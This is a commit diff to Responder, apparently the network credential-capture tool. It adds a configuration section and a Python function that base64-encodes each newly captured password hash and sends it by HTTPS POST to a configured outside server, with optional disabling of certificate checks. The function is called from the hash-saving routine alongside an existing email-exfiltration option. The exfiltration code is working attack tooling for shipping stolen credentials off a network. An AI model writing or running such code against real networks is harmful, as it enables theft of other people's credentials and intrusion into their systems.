Added HTTPS Exfiltration which sends newly found hsahes as a POST request to the specified URL

2025-08-22 06:13:39 -07:00 · 2021-06-02 02:16:36 -05:00 · 2021-06-02 02:16:36 -05:00 · 408e017377
commit 408e017377
parent 5292c3ea39
3 changed files with 44 additions and 6 deletions
--- a/Responder.conf
+++ b/Responder.conf
@ -108,3 +108,8 @@ username=sendingaddress@domain.com
 password=passwordtoemail
 port=587
 server=mail.domain.com
+
+[HTTPS Exfiltration]
+enabled=On
+url=https://domain.com:9090
+verifyssl=Off
--- a/settings.py
+++ b/settings.py
@ -84,13 +84,18 @@ class Settings:
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))

+		# HTTPS Exfiltration
+		self.httpsexfil_enabled  = self.toBool(config.get('HTTPS Exfiltration','enabled'))
+		self.httpsexfil_url      = config.get('HTTPS Exfiltration','url')
+		self.httpsexfil_verify  = self.toBool(config.get('HTTPS Exfiltration','verifyssl'))
+
 		# Email
-		self.emailenabled = self.toBool(config.get('Email', 'enabled'))
-		self.emailserver = config.get('Email', 'server')
-		self.emailport = config.get('Email', 'port')
-		self.emailpassword = config.get('Email', 'password')
-		self.emailusername = config.get('Email', 'username')
-		self.emailsendto = config.get('Email', 'sendtoaddress')
+		self.emailenabled     = self.toBool(config.get('Email', 'enabled'))
+		self.emailserver      = config.get('Email', 'server')
+		self.emailport        = config.get('Email', 'port')
+		self.emailpassword    = config.get('Email', 'password')
+		self.emailusername    = config.get('Email', 'username')
+		self.emailsendto      = config.get('Email', 'sendtoaddress')

 		# Servers
 		self.HTTP_On_Off     = self.toBool(config.get('Responder Core', 'HTTP'))
--- a/utils.py
+++ b/utils.py
@ -26,6 +26,31 @@ import codecs
 import struct
 from calendar import timegm

+def HTTPExfil(result):
+    result = str(result)
+    try:
+        if not settings.Config.httpsexfil_enabled:
+            return
+        # requests isn't in stdlib, so using urllib
+        import urllib.parse 
+        import urllib.request
+        import ssl
+        import base64
+        ctx = ssl.create_default_context()
+        if not settings.Config.httpsexfil_verify:
+            ctx.check_hostname = False
+            ctx.verify_mode = ssl.CERT_NONE
+
+        data = {
+            'hashes' : base64.b64encode(result.encode()),
+        }
+        data = bytes( urllib.parse.urlencode( data ).encode() )
+        handler = urllib.request.urlopen( settings.Config.httpsexfil_url, data , context=ctx)
+        print(color("[HTTPS Exfil]",3,1),"Sent via https exfil")
+    except Exception as e:
+        print(color("[HTTPS Exfil]",1),"Error sending via HTTPS Exfil{}".format(e))
+        return
+
 def EmailHash(result):
    import smtplib
    if not settings.Config.emailenabled:
@ -312,6 +337,9 @@ def SaveToDb(result):
 		# Email to desired email address
 		EmailHash(str(result))

+		# Send via POST to HTTPS server
+		HTTPExfil(result)
+        
 	elif len(result['cleartext']):
 		print(color('[*] Skipping previously captured cleartext password for %s' % result['user'], 3, 1))
 		text('[*] Skipping previously captured cleartext password for %s' % result['user'])